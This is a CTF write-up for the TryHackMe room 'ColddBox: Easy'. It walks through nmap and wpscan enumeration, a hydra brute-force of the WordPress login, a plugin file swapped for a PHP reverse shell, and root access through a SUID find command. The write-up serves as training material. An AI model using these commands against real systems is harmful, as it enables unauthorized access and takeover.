📓
Pentesting
  • Writeups
  • HackTheBox
    • Easy Machines
      • Beep Writeup
      • Shocker Writeup
      • Lame Writeup
      • Jerry Writeup
      • Legacy Writeup
      • Blue Writeup
  • TryHackMe
    • Walkthroughs: Easy
      • CC: Steganography
      • Cryptography for Dummies
      • Cross-site Scripting
      • SQL Injection Lab
      • SQL Injection
      • ZTH: Web 2
      • SSRF
      • XXE
      • Authenticate
      • Injection
      • Blaster
      • The Cod Caper
      • Hardening Basics Part 1
      • What the Shell?
      • Game Zone
      • Upload Vulnerabilities
      • Bolt
      • Erit Securus 1
      • CC: Pentesting
      • JavaScript Basics
      • OverPass 2 - Hacked
      • Linux: Local Enumeration
      • Ice
      • Linux Backdoors
      • Avengers Blog
      • DNS in Detail
      • Putting it all together
      • Kenobi
      • Common Linux Privesc
      • Network Services 2
      • Network Services
      • The Hacker Methodology
      • The Find command
      • HTTP in Detail
      • Web Fundamentals
      • How Websites Work
      • Introductory Networking
    • Challenges (CTF): Easy
      • VulNet: Roasted
      • VulNet: Internal
      • Git Happens
      • Kiba
      • VulNet: Node
      • Memory Forensics
      • Smag Grotto
      • Investigating Windows
      • Cat Pictures
      • Juicy Details
      • Anthem
      • Tony The Tiger
      • Jack-of-All-Trades
      • JPGChat
      • Blueprint
      • All in One
      • Gotta Catch'em All
      • Mustacchio
      • Break Out The Cage
      • HeartBleed
      • Poster
      • Madness
      • Source
      • Thompson
      • Library
      • Magician
      • Anonforce
      • Dav
      • GLITCH
      • Fowsniff CTF
      • Team
      • H4cked
      • Easy Peasy
      • ColddBox: Easy
      • Archangel
      • Cyborg
      • Chocolate Factory
      • Brute It
      • Year of the Rabbit
      • ChillHack
      • Gaming Server
      • Brooklyn Nine Nine
      • Wgel CTF
      • Tomghost
      • ToolsRus
      • Skynet
      • Startup
      • Agent Sudo
      • Lian-Yu
      • OhSINT
      • Overpass
      • Crack The Hash
      • Ignite
      • Inclusion
      • Bounty Hunter
      • LazyAdmin
      • RootMe
      • Pickle Rick
      • Basic Pentesting
      • Simple CTF
  • Crackmes.one
    • 1 Difficulty Rating
      • easyAF
      • Easy Keyg3nme
Powered by GitBook
On this page
  • Reconnaissance
  • Enumeration
  • Exploitation
  • Privilege Escalation

Was this helpful?

  1. TryHackMe
  2. Challenges (CTF): Easy

ColddBox: Easy

PreviousEasy PeasyNextArchangel

Last updated 3 years ago

Was this helpful?

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.70.76

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 80

  • (-oN nmap): Saving it into a file called nmap

nmap -sV -sC -p 80 -oN nmap 10.10.70.76

Enumeration

Lets visit the site

Looks like a well made page, while looking through the website I found a login page.

Also looking at the nmap scan, we know that WordPress 4.1.31 is running, also there is a Wordpress scanner called wpscan , lets use it to find more information.

wpscan --url http://10.10.70.76/ -e vp,t,u

Looking at the output, we find some interesting information

Lets use hydra to bruteforce and find atleast one password for one of the users. I saved the usernames in a file called users.

Exploitation

Lets now use hydra to crack the password

hydra -L users -P /usr/share/wordlists/rockyou.txt 10.10.70.76 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

And we get the password, lets login

After changing it, click update file and start a netcat listener.

Then navigate to the page.

http://10.10.58.100/wp-content/plugins/akismet/akismet.php

You should get a reverse shell. Lets stabilize the shell.

Privilege Escalation

Lets look for SUIDs that we can exploit.

find / -perm -u=s -type f 2>/dev/null

We have /usr/bin/find, lets go to GTFOBins and find the command to privilege escalate.

Lets use the second command

find . -exec /bin/sh -p \; -quit

We are now root.

We are logged in. For getting a reverse shell on the machine we have to add a reverse shell that you can find . First lets go to the Plugins tab and then replace one of the plugins with the php reverse shell, also make sure to change the IP to yours.

here